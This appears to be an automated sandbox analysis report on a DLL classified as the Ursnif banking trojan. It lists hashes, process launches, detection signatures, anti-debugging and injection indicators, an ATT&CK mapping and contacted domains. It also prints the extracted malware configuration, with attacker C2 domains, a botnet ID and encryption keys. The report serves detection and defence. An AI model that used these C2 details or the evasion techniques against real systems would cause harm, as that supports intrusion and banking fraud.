Analysis Report 8OKQ6ogGRx.dll

Overview

General Information

Sample Name: 8OKQ6ogGRx.dll
Analysis ID: 404147
MD5: e8eae1a820426a722c7cae54ed5bacd8
SHA1: 4d8368f112e0c56e7caccb89724bfdad1999e706
SHA256: eb498648d17ad5250ab1f38b190dd2da8bfa8db3ee86054db991db79d15ad5cc
Tags: dll
Detection

Ursnif
Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Ursnif
Writes or reads registry keys via WMI
Writes registry values via WMI
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found potential string decryption / allocating functions
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Startup

  • System is w10x64
  • loaddll32.exe (PID: 2168 cmdline: loaddll32.exe 'C:\Users\user\Desktop\8OKQ6ogGRx.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 3880 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\8OKQ6ogGRx.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6024 cmdline: rundll32.exe 'C:\Users\user\Desktop\8OKQ6ogGRx.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 3468 cmdline: rundll32.exe C:\Users\user\Desktop\8OKQ6ogGRx.dll,Enterbeen MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 3512 cmdline: rundll32.exe C:\Users\user\Desktop\8OKQ6ogGRx.dll,Multiply MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • iexplore.exe (PID: 5212 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5240 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5212 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "KfAh1HjBYV5+GLf1H4+++WQcflLYE80sojTEX/uvXaLXhDxSfFOCIe7aHw1TYNxXIBvEkznlAveWMvLVTSjkgy/Hqpm47GUbXiPUxbpl0qoDhGQpz45mxRQlc+jgXQ4D03Y0gMF90NeOpBOEi497zfDlURi8Me7OHCSUNpn4Q0kQtrInhQlll9V6IFuYjZJB", "c2_domain": ["outlook.com/login", "gmail.com", "dorelunonu.us", "morelunonu.us"], "botnet": "8877", "server": "12", "serpent_key": "30218409ILPAJDUR", "sleep_time": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.470954657.0000000003618000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
Process Memory Space: loaddll32.exe PID: 2168 | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |

      Sigma Overview

      No Sigma rule has matched

      Signature Overview

      AV Detection:

      Found malware configuration
      Source: 3.3.rundll32.exe.30aa438.0.raw.unpackMalware Configuration Extractor: Ursnif {"RSA Public Key": "KfAh1HjBYV5+GLf1H4+++WQcflLYE80sojTEX/uvXaLXhDxSfFOCIe7aHw1TYNxXIBvEkznlAveWMvLVTSjkgy/Hqpm47GUbXiPUxbpl0qoDhGQpz45mxRQlc+jgXQ4D03Y0gMF90NeOpBOEi497zfDlURi8Me7OHCSUNpn4Q0kQtrInhQlll9V6IFuYjZJB", "c2_domain": ["outlook.com/login", "gmail.com", "dorelunonu.us", "morelunonu.us"], "botnet": "8877", "server": "12", "serpent_key": "30218409ILPAJDUR", "sleep_time": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}
      Source: 8OKQ6ogGRx.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
      Source: 8OKQ6ogGRx.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
      Source: Binary string: c:\364\Head\Fresh-Room\score_Several\turn.pdb source: loaddll32.exe, 00000000.00000002.474262084.000000006E12B000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.473027283.000000006E12B000.00000002.00020000.sdmp, 8OKQ6ogGRx.dll
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00BB896F RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,0_2_00BB896F
      Source: unknownDNS traffic detected: queries for: outlook.com

      Key, Mouse, Clipboard, Microphone and Screen Capturing:

      Yara detected Ursnif
      Source: Yara matchFile source: 00000000.00000002.470954657.0000000003618000.00000004.00000040.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 2168, type: MEMORY

      E-Banking Fraud:

      Yara detected Ursnif
      Source: Yara matchFile source: 00000000.00000002.470954657.0000000003618000.00000004.00000040.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 2168, type: MEMORY

      System Summary:

      Writes or reads registry keys via WMI
      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
      Writes registry values via WMI
      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E0C101B NtMapViewOfSection,0_2_6E0C101B
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E0C145E NtCreateSection,memset,0_2_6E0C145E
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E0C23A5 NtQueryVirtualMemory,0_2_6E0C23A5
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00BB1724 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,0_2_00BB1724
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00BBB301 NtQueryVirtualMemory,0_2_00BBB301
      Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6E10B2D0 appears 32 times
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E10B2D0 appears 32 times
      Source: 8OKQ6ogGRx.dllBinary or memory string: OriginalFilenameturn.dll8 vs 8OKQ6ogGRx.dll
      Source: 8OKQ6ogGRx.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
      Source: 8OKQ6ogGRx.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: classification engineClassification label: mal64.troj.winDLL@12/4@3/0
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00BB24C7 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00BB24C7
      Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High
      Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DFFDCA7E35786F02EC.TMP
      Source: 8OKQ6ogGRx.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.ini
      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\8OKQ6ogGRx.dll,Enterbeen
      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\8OKQ6ogGRx.dll'
      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\8OKQ6ogGRx.dll',#1
      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\8OKQ6ogGRx.dll,Enterbeen
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\8OKQ6ogGRx.dll',#1
      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\8OKQ6ogGRx.dll,Multiply
      Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5212 CREDAT:17410 /prefetch:2
      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: 8OKQ6ogGRx.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: 8OKQ6ogGRx.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: 8OKQ6ogGRx.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: 8OKQ6ogGRx.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: 8OKQ6ogGRx.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: 8OKQ6ogGRx.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: 8OKQ6ogGRx.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
      Source: 8OKQ6ogGRx.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: c:\364\Head\Fresh-Room\score_Several\turn.pdb source: loaddll32.exe, 00000000.00000002.474262084.000000006E12B000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.473027283.000000006E12B000.00000002.00020000.sdmp, 8OKQ6ogGRx.dll
      Source: 8OKQ6ogGRx.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: 8OKQ6ogGRx.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
      Source: 8OKQ6ogGRx.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: 8OKQ6ogGRx.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: 8OKQ6ogGRx.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E0C160D LoadLibraryA,GetProcAddress,0_2_6E0C160D
      Source: 8OKQ6ogGRx.dllStatic PE information: real checksum: 0x8203c should be: 0x8017c
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E0C2120 push ecx; ret 0_2_6E0C2129
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E0C2173 push ecx; ret 0_2_6E0C2183
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00BBB0CB push ecx; ret 0_2_00BBB0DB
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00BBAD10 push ecx; ret 0_2_00BBAD19
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E10B315 push ecx; ret 0_2_6E10B328
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E14221D push eax; retf 0_2_6E142220
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E142BB6 push ecx; ret 0_2_6E142BD1
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E0D420E push es; ret 3_2_6E0D420F
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E0D423B push ebx; ret 3_2_6E0D424E
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E10B315 push ecx; ret 3_2_6E10B328
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E0D43C5 push ebp; ret 3_2_6E0D43CE
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E0D5842 push esp; ret 3_2_6E0D588C
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E14221D push eax; retf 3_2_6E142220
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E142BB6 push ecx; ret 3_2_6E142BD1

      Hooking and other Techniques for Hiding and Protection:

      Yara detected Ursnif
      Source: Yara matchFile source: 00000000.00000002.470954657.0000000003618000.00000004.00000040.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 2168, type: MEMORY
      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00BB896F RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,0_2_00BB896F
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E10C6CB _memset,IsDebuggerPresent,0_2_6E10C6CB
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E112CFE ___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,0_2_6E112CFE
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E0C160D LoadLibraryA,GetProcAddress,0_2_6E0C160D
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E141302 mov eax, dword ptr fs:[00000030h]0_2_6E141302
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E140E3F push dword ptr fs:[00000030h]0_2_6E140E3F
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E141238 mov eax, dword ptr fs:[00000030h]0_2_6E141238
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E141302 mov eax, dword ptr fs:[00000030h]3_2_6E141302
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E140E3F push dword ptr fs:[00000030h]3_2_6E140E3F
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E141238 mov eax, dword ptr fs:[00000030h]3_2_6E141238
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E10B830 GetProcessHeap,0_2_6E10B830
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E111090 SetUnhandledExceptionFilter,0_2_6E111090
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1110C1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6E1110C1
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E111090 SetUnhandledExceptionFilter,3_2_6E111090
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E1110C1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6E1110C1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\8OKQ6ogGRx.dll',#1
      Source: loaddll32.exe, 00000000.00000002.470347990.0000000001620000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.472110783.0000000003640000.00000002.00000001.sdmpBinary or memory string: Program Manager
      Source: loaddll32.exe, 00000000.00000002.470347990.0000000001620000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.472110783.0000000003640000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: loaddll32.exe, 00000000.00000002.470347990.0000000001620000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.472110783.0000000003640000.00000002.00000001.sdmpBinary or memory string: Progman
      Source: loaddll32.exe, 00000000.00000002.470347990.0000000001620000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.472110783.0000000003640000.00000002.00000001.sdmpBinary or memory string: Progmanlock
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00BB7EC1 cpuid 0_2_00BB7EC1
      Source: C:\Windows\System32\loaddll32.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_6E12770D
      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,0_2_6E1277BA
      Source: C:\Windows\System32\loaddll32.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,0_2_6E1275E3
      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,0_2_6E111A40
      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,0_2_6E127292
      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,0_2_6E111AC6
      Source: C:\Windows\System32\loaddll32.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,0_2_6E1272EE
      Source: C:\Windows\System32\loaddll32.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,0_2_6E12736B
      Source: C:\Windows\System32\loaddll32.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,0_2_6E1273EE
      Source: C:\Windows\System32\loaddll32.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,0_2_6E12701E
      Source: C:\Windows\System32\loaddll32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_6E11185F
      Source: C:\Windows\System32\loaddll32.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,0_2_6E10A8B9
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_6E12770D
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,3_2_6E1277BA
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,3_2_6E1275E3
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,3_2_6E111A40
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,3_2_6E127292
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,3_2_6E111AC6
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,3_2_6E1272EE
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,3_2_6E12736B
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,3_2_6E1273EE
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,3_2_6E12701E
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,3_2_6E11185F
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,3_2_6E10A8B9
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E0C195D GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,0_2_6E0C195D
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00BB7EC1 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,0_2_00BB7EC1
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E10CFA3 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_6E10CFA3
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E0C1800 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,0_2_6E0C1800

      Stealing of Sensitive Information:

      Yara detected Ursnif
      Source: Yara matchFile source: 00000000.00000002.470954657.0000000003618000.00000004.00000040.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 2168, type: MEMORY

      Remote Access Functionality:

      Yara detected Ursnif
      Source: Yara matchFile source: 00000000.00000002.470954657.0000000003618000.00000004.00000040.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 2168, type: MEMORY

      Mitre Att&ck Matrix

      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
      Valid Accounts | Windows Management Instrumentation 2 | Path Interception | Process Injection 12 | Masquerading 1 | OS Credential Dumping | System Time Discovery 2 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
      Default Accounts | Native API 1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection 12 | LSASS Memory | Security Software Discovery 3 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
      Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information 1 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
      Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 2 | NTDS | Account Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Rundll32 1 | LSA Secrets | System Owner/User Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
      Replication Through Removable Media | Launchd | Rc.common | Rc.common | Software Packing 1 | Cached Domain Credentials | File and Directory Discovery 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
      External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | System Information Discovery 23 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact

      Behavior Graph

      [Figure: Behavior Graph ID: 404147, Sample: 8OKQ6ogGRx.dll, Startdate: 04/05/2021, Architecture: WINDOWS, Score: 64. Process nodes: loaddll32.exe started cmd.exe and two rundll32.exe processes; cmd.exe started rundll32.exe; iexplore.exe started a second iexplore.exe. Signature nodes: Found malware configuration; Yara detected Ursnif; Writes or reads registry keys via WMI; Writes registry values via WMI. DNS/IP nodes: www.outlook.com, outlook.office365.com, 5 other IPs or domains.]

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      No Antivirus matches

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      Source | Detection | Scanner | Label
      0.2.loaddll32.exe.bb0000.0.unpack | 100% | Avira | HEUR/AGEN.1108168

      Domains

      No Antivirus matches

      URLs

      No Antivirus matches

      Domains and IPs

      Contacted Domains

      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      outlook.com | 40.97.161.50 | true | false | | high
      HHN-efz.ms-acdc.office.com | 40.101.138.2 | true | false | | high
      FRA-efz.ms-acdc.office.com | 40.101.81.162 | true | false | | high
      www.outlook.com | unknown | unknown | false | | high
      outlook.office365.com | unknown | unknown | false | | high

                Contacted IPs

                No contacted IP infos

                General Information

                Joe Sandbox Version: 32.0.0 Black Diamond
                Analysis ID: 404147
                Start date: 04.05.2021
                Start time: 18:50:36
                Joe Sandbox Product: CloudBasic
                Overall analysis duration: 0h 7m 14s
                Hypervisor based Inspection enabled: false
                Report type: full
                Sample file name: 8OKQ6ogGRx.dll
                Cookbook file name: default.jbs
                Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed: 24
                Number of new started drivers analysed: 0
                Number of existing processes analysed: 0
                Number of existing drivers analysed: 0
                Number of injected processes analysed: 0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal64.troj.winDLL@12/4@3/0
                EGA Information:Failed
                HDC Information:
                • Successful, ratio: 12.7% (good quality ratio 12.1%)
                • Quality average: 79.5%
                • Quality standard deviation: 28.7%
                HCA Information:
                • Successful, ratio: 73%
                • Number of executed functions: 39
                • Number of non-executed functions: 71
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .dll
                Warnings:
                • Exclude process from analysis (whitelisted): taskhostw.exe, audiodg.exe, BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, SgrmBroker.exe, WmiPrvSE.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 52.147.198.201, 204.79.197.200, 13.107.21.200, 20.49.157.6, 104.43.193.48, 168.61.161.212, 92.122.145.220, 184.30.24.56, 2.20.142.209, 2.20.142.210, 20.82.209.183, 92.122.213.247, 92.122.213.194, 88.221.62.148, 2.17.179.193, 84.53.167.113, 20.82.210.154
